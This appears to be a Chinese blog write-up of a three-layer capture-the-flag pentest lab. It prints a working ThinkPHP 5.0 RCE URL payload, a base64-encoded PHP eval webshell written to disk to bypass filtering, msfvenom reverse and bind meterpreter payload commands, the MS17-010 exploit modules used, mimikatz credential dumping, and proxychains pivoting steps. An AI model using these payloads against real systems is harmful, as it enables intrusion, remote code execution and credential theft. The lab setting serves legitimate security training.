CFS三层靶机渗透记录

0x00 前言

这是 TeamsSix前辈出的一个三层内网渗透的靶场,偏向于CTF,但更类似于真实的渗透环境。通过一层一层的渗透,获取每个靶机的flag。

0x01 环境搭建

靶场获取:https://pan.baidu.com/s/1m3JoNfyxE-a96o7DMb1eLw 提取码:ht9o

靶场环境网络拓扑图:
在这里插入图片描述
导入虚拟机后,根据拓扑图进行网络配置或者自己设置。

targe1:172.12.200.153 192.168.22.128
targe2:192.168.22.129 192.168.33.128
targe3:192.168.33.129

0x02 target1

1、信息收集

首先简单的信息收集来一波,发现存在ThinkPHP-V5.0-RCE 远程代码执行漏洞。
端口服务:21、22、80、111、888、3306、8888
在这里插入图片描述
目录文件:
http://172.16.200.153/robots.txt(发现第一个flag)

在这里插入图片描述
http://172.16.200.153/index.php(ThinkPHP-V5.0-RCE-远程代码执行漏洞)在这里插入图片描述

2、漏洞利用–Getshell:

确定漏洞是否存在payload:

http://172.16.200.153//index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
确定存在后开始写shell:
在这里插入图片描述
貌似被过滤了,后面用nc反弹的方法又写了一遍发现过滤了post
在这里插入图片描述
使用base64绕过试试:
在这里插入图片描述

payload:echo " PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg=="|base64 -d > a.php

在这里插入图片描述
在这里插入图片描述
成功写入后,使用工具连接一下小马儿,刚好发现了第二flag。
第二了flag
发现第三个flag:
第三个flag

3、边界机信息收集:

边界机信息收集:IP段 -->IP段主机存活 -->存活IP端口服务、敏感信息、帐号密码
系统版本信息:
在这里插入图片描述
由于172.16.200.0段是我自己的,所以主要探测192.168.22.0段的IP存活:
IP段
这里可以使用脚本进行探测,但考虑到后面的渗透。我感觉还是使用MSF比较方便。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.200.139 lport=12345 -f elf -o 153.elf

使用msfvenom生成payload,之后上传到被控制服务器,给权限后执行获取session。
在这里插入图片描述
接下来探测192.168.22.0段的IP存活、端口服务,不过探测主机存活和端口前需要添加内网路由:
在这里插入图片描述

接下来使用auxiliary/scanner/portscan/tcp 探测主机存活:
在这里插入图片描述
结果扫描出192.168.22.128、192.168.22.129,其中128是本机,接下来扫描192.168.22.129的端口:
在这里插入图片描述
继续使用该模块扫描端口:
在这里插入图片描述
可以发现主机开放了21、22、80、888、3306、5555、8888端口,当然我们是也可以使用nmap进行扫描,不过扫描之前,需要使用auxiliary/server/socks4a模块,然后配置一下proxychain 代理:
在这里插入图片描述

Vi /etc/proxychains.conf

在这里插入图片描述接下来就可以使用nmap 进行端口服务扫描了
Proxychains nmap -Pn -sT 192.168.22.129
在这里插入图片描述

0x03 target2

1、漏洞利用–Getshell

通过对内网129主机进行端口服务,目录等进行信息收集后,发现这里存在一个bagecms 3.1的内容管理系统,该版本存在多个高危漏洞。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
找到一个提示点:
在这里插入图片描述
既然存在注入漏洞,那么就从注入漏洞下手,获取帐号密码,然后直接getshell.
在这里插入图片描述
获取帐号密码后,进入后台:
在这里插入图片描述
在模版中写入一句话木马,然后连接小马儿:

在这里插入图片描述在这里插入图片描述
连接之前需要配置Proxifiler代理:
在这里插入图片描述
成功连接小马儿,并找到第二个flag。
在这里插入图片描述

2、边界机信息收集

接下来继续收集该主机的IP网段,端口服务。但是在这之前,需要先获取一个正向连接msf的shell。

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=54321 -f elf > 129.elf

在这里插入图片描述
然后上传木马,给权限执行,获取shell,当然这里需要使用代理重启一个msf。

在这里插入图片描述

加上前面两个,共有6个flag:
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
接下来添加路由,设置代理,继续搞内网。由于192.168.22.0段我们已经搞过了,这里需要探测的是192.168.33.0段。
在这里插入图片描述
使用之前的模块扫描IP存活和端口:

auxiliary/scanner/portscan/tcp

在这里插入图片描述
扫描后发现一个存活IP:192.168.33.129,还开放了445、3389,可能存在永恒之蓝。在这里插入图片描述

0x04 target3

1、漏洞利用-MS17-010

使用了MSF的模块对它进行探测看看是否存在永恒之蓝。

auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述

确定存在后,使用下面的攻击模块进行攻击。

exploit/windows/smb/ms17_010_psexe

在这里插入图片描述

2、提权

提权–> 获取帐号密码
在这里插入图片描述
使用msf 自带的 mimikatz 获取帐号密码:
在这里插入图片描述
因为端口探测时已经知道3389是开放的了,这里直接把3389转发出来:
在这里插入图片描述
这里需要使用代理连接:

proxychains rdesktop 127.0.0.1:3389

在这里插入图片描述
输入帐号密码进入系统找flag,共有4个。如下图:
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

0x05 总结

利用点:

  • ThinkPHP-V5.0-RCE 远程代码执行漏洞
  • bagecms 3.1 sql注入漏洞、后台getshell
  • ms17-010 漏洞

技术点:

  • 使用编码绕过防护写入小马
  • Msfvenonm生成木马
  • MSF基本用法
  • MSF-路由转发和代理配置
  • MSF的内网主机探测
  • MSF常用攻击模块使用等
  • 2
    点赞
  • 8
    收藏
  • 打赏
    打赏
  • 4
    评论
BageCms是一款基于php5 mysql5开发的多功能开源的网站内容管理系统。使用高性能的PHP5的web应用程序开发框架YII构建,具有操作简单、稳定、安全、高效、跨平台等特点。采用MVC设计模式,模板定制方便灵活,内置小挂工具,方便制作各类功能和效果,BageCms可用于企业建站、个人博客、资讯门户、图片站等各类型站点。 BageCMS(八哥CMS)特点 1.开源免费 无论是个人还是企业展示型网站均可用本系统来完成 2.数据调用方便快捷 自主研发的数据调用模块,能快速调用各类型数据,方便建站 3.应用范围广 这套系统不是企业网站管理系统,也不是博客程序,更不是专业的图片管理系统,但它却具备大部分企业站、博客站、图片站的功能 4.安全高性能 基于高性能的PHP5的web应用程序开发框架YII构建具有稳定、安全、高效、跨平台等特点 5.URL自定义 系统支持自定义伪静态显示方式,良好的支持搜索引擎SEO。个性化设置每个栏目、内容的标题标签、描述标签、关键词标签 6.自定义数据模型 系统可自定义数据模型满足各种表示形式和字段需求 7.完善的后台权限控制 特有的管理员权限管理机制,可以灵活设置管理员的栏目管理权限、网站信息的添加、修改、删除权限等 BageCMS(八哥CMS)v3.1.3更新日志 此次更新仅做安全问题进行修正,未涉及到程序的功能升级。 BageCMS(八哥CMS)前台截图 BageCMS(八哥CMS)后台截图 后台地址:http://demo.bagecms.com/admini 用户:bagecms 密码:bagecms 相关阅读 同类推荐:站长常用源码 BageCMS安装教程:http://down.admin5.com/info/2013/0926/105491.html

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:数字20 设计师:CSDN官方博客 返回首页
评论 4

打赏作者

Beret-81

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值